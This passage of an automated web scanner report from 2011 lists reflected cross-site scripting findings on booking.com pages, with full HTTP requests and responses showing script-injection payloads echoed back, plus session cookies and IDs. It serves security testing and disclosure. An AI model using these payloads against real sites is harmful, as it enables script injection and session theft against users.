<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
p://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X187a75"><script>alert(1)</script>aac1708aa5d">
...[SNIP]...
4.202. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b59c'-alert(1)-'c9428a7f052 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1&4b59c'-alert(1)-'c9428a7f052=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2B2jJT0X%2B8rChyqM7yysg1FGs9IvgNEDxWLU94%2FE%2BcAbif%2BNQSnyQA5GWRSlyIlO3urvu3ODBMyPnmIXRXfZNRssJhHH8beCoDih1vT%2Bw5dk75YQK0bvBE4BO%2Bo3xt4otM7WVTXzgKZS16cUl6W6dr%2BP%2FwHo%2BDG1IMW4BNha120wThGlL%2FYtRNux3Ys%2FG5LcMOhYVqHPI3y8p9o949nJaosdn2Wa7ZJ3HdEfXNC1KarWhmAA%2BsR0iFXk%2Bgk1KSAhGspoEHMtfv%2BaAPKKrGIBkKImbGTbZ0DRUXD8iGkM5AFfSXqwL6BuNExy8%2F15NskuXCtKhiBmLG%2B%2FoS7svWDcGsAMwzNJIEyikWcQLrHx8bIg9JnycJfRVphgAkkiXJkK2otimFTLH4HEMYKzZtU3FWzg7FeVlnOroUMYg9VHzwUTMfXxUk%2BGpsrN7N1OoiVZXul5LsFT9%2BzQPE%2FVZG4YZq59Pufz64ZUpT%2Bo76VgQhHMkbdQmY0vV2gQGwDtWsDYpGPa3UIGA%2FOuVCULiYOsOqEo1kucvGmzzYFdCIipjB1%2FsrMhFETlzYDmoHAdb4duykgrZuSCBEZGoXdh%2FTFYRiYZYe%2BpZ0xkrd1VHYj1dUWdnzOB2zMyBc3x2C4n9W0BIMx8TqG3vjpd5VlI3Si1WWyXaKeZsb%2FJFiLb5NrJI6fsqzyQOWbV53RJFUSD%2FWYuxghuW0%2F0139DcCZDLSWoiCqQ2lQaRYXfz3Lap6KhXtFk43ZO3WpdcK9kpdKoaHBl9BydbiWiI2Kldc78d40F7zdYKdGodWCZlmNTyX8QV6uH2hPrFUtRT8fa8hkS4YMGVcpJslgFaTkZBf2YzYIYZg%2BGuGpSx3ImmTt%2Bnnvh32i7LTi1tVcoBs%2FpQrq2dX8tc603MfW13lGvOzpuCA39nVJ6maKdKgaGlhMSFPEChuSVbhmgJLfV57SmaTD69hrqWyN7EHXHPnc%2FHmRstCR0nNj7GlqbiI54Bzqi7U9vADN3hD9pa0Ncpyrhwes%2Fp0WplHD7lmkAa1GbnRBCyLYl3%2FksCX4GGAYrRhoAhw2IdCdDSXX9chmxNETjylJcs4mXw1G0zCpnCsuveNt8Nc4BPZFj3G4A00nsqQrg%2BovwgdQajdHtw%2FIl7vOBC9TiXgfVKkJGXn%2F%2Fl%2Fr%2FYDWapN8vpskDKrCmG%2F%2Bw63UVgZ8rBvSLkeQqjG8Fvewcar6ehhmA8L22fBtJAYNv0DZLXJhxq5soOIInjGHIAa2%2FhjYKjFcgERN9TTZpmSpy%2FAXLC1mtswtnXquScz6QmgNDuPH2V5%2FZaRJj11PZCvSFfPZjWLkNgAPgWFZIJAUAEnNK1So4AE2HHhq4Ki3nBMbB7cycYJ%2F3T35VIP3071xmlxvGpY4rmxT0unLLRRlJKoi2ZNAt6lsL0JSuc7Tcw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249101
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
translate = 'show automatic translation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/copley-square.en.html?4b59c'-alert(1)-'c9428a7f052=1';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.b_southwest_l
...[SNIP]...
4.203. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5695f"><script>alert(1)</script>df25147b85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1&5695f"><script>alert(1)</script>df25147b85d=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:38 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2B2jJT0X%2B8rChyqM7yysg1FGs9IvgNEDxWLU94%2FE%2BcAbif%2BNQSnyQA5GWRSlyIlO3urvu3ODBMyPnmIXRXfZNRssJhHH8beCoDih1vT%2Bw5dk75YQK0bvBE4BO%2Bo3xt4otM7WVTXzgKZS16cUl6W6dr%2BP%2FwHo%2BDG1IMW4BNha120wThGlL%2FYtRNux3Ys%2FG5LcMOhYVqHPI3y8p9o949nJaosdn2Wa7ZJ3HdEfXNC1KarWhmAA%2BsR0iFXk%2Bgk1KSAhGspoEHMtfv%2BaAPKKrGIBkKImbGTbZ0DRUXD8iGkM5AFfSXqwL6BuNExy8%2F15NskuXCtKhiBmLG%2B%2FoS7svWDcGsAMwzNJIEyikWcQLrHx8bIg9JnycJfRVphgAkkiXJkK2otimFTLH4HEMYKzZtU3FWzg7FeVlnOroUMYg9VHzwUTMfXxUk%2BGpsrN7N1OoiVZXul5LsFT9%2BzQPE%2FVZG4YZq59Pufz64ZUpT%2Bo76VgQhHMkbdQmY0vV2gQGwDtWsDYpGPa3UIGA%2FOuVCULiYOsOqEo1kucvGmzzYFdCIipjB1%2FsrMhFETlzYDmoHAdb4duykgrZuSCBEZGoXdh%2FTFYRiYZYe%2BpZ0xkrd1VHYj1dUWdnzOB2zMyBc3x2C4n9W0BIMx8TqG3vjpd5VlI3Si1WWyXaKeZsb%2FJFiLb5NrJI6fsqzyQOWbV53RJFUSD%2FWYuxghuW0%2F0139DcCZDLSWoiCqQ2lQaRYXfz3Lap6KhXtFk43ZO3WpdcK9kpdKoaHBl9BydbiWiI2Kldc78d40F7zdYKdGodWCZlmNTyX8QV6uH2hPrFUtRT8fa8hkS4YMGVcpJslgFaTkZGYQqYxL1sSvVqTnUmzmugpmpRSzRkBSpOh31GzWDodNw%2BBEGQa0nea5Lpg6nnyuK2eV11wwK6wKiY2lVUUdupSNWbDKGw1X9VfEy%2FiPC3BRzY7Zk9wCR3H78dV4uP2EFit9cWxeZywnYWq3yBhONlrfMFTXhRoEHI6J%2BU2aTps%2F17SEh3X30VhKXS2SMDhMhvt8x9GX1Od9PQ6MBILoPrnteyG1do80hxRDtD%2F%2Be7FPFaaKJZilHc8GqlrbnjtNuUdfGUAGT5IpxIu2bYkavYrKyAJt3xYGVZU8%2FpJufdYQIUvdxPL5zP2WdLr0yiUDT92ZZmv%2FoOdOSqwEe71hkjhECn5p7hTuAu2xeGuQJdXZl1nus%2Fua80FKUoSj8Gc%2FLi6UE8S0R4armDgjmevOq%2FtICUFlMuZI7sA0aN25aq8HO9%2FsExcvaJvW9nHsV8USobKjr%2F08ZbFUOyOTi1f23waD2IquS1IV5ndc0KIjztx6BupqHNub9betLN4zxmzAKVsla76LGh0lzzzsKeIOXSoU7WrShupoPhbjXtk7Ha%2BWkNzWxUG0NcQeeuLen59v6g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249285
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/copley-square.en.html?5695f"><script>alert(1)</script>df25147b85d=1" />
...[SNIP]...
4.204. http://www.booking.com/load_times [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /load_times

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53495'%3balert(1)//0c7dd70f369 was submitted in the REST URL parameter 1. This input was echoed as 53495';alert(1)//0c7dd70f369 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

PUT /load_times53495'%3balert(1)//0c7dd70f369 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
Content-Length: 59
Origin: http://www.booking.com
X-Booking-AID: 335591
X-Booking-Pageview-Id: 118b01157ba2001b
X-Requested-With: XMLHttpRequest
X-Booking-Session-Id: 9fcdaabed9e2bb46b60772539b0ca101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

jquery_ready=59508&window_onload=67479&pid=118b01157ba2001b

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:24 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51742
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
g.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/load_times53495';alert(1)//0c7dd70f369';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.close_button = "C
...[SNIP]...
4.205. http://www.booking.com/load_times [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /load_times

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415f0"><script>alert(1)</script>faf880f0642 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

PUT /load_times415f0"><script>alert(1)</script>faf880f0642 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
Content-Length: 59
Origin: http://www.booking.com
X-Booking-AID: 335591
X-Booking-Pageview-Id: 118b01157ba2001b
X-Requested-With: XMLHttpRequest
X-Booking-Session-Id: 9fcdaabed9e2bb46b60772539b0ca101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

jquery_ready=59508&window_onload=67479&pid=118b01157ba2001b

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:19 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51826
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/load_times415f0"><script>alert(1)</script>faf880f0642" />
...[SNIP]...
4.206. http://www.booking.com/logo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7af"><script>alert(1)</script>9d469f9415c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logobc7af"><script>alert(1)</script>9d469f9415c?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
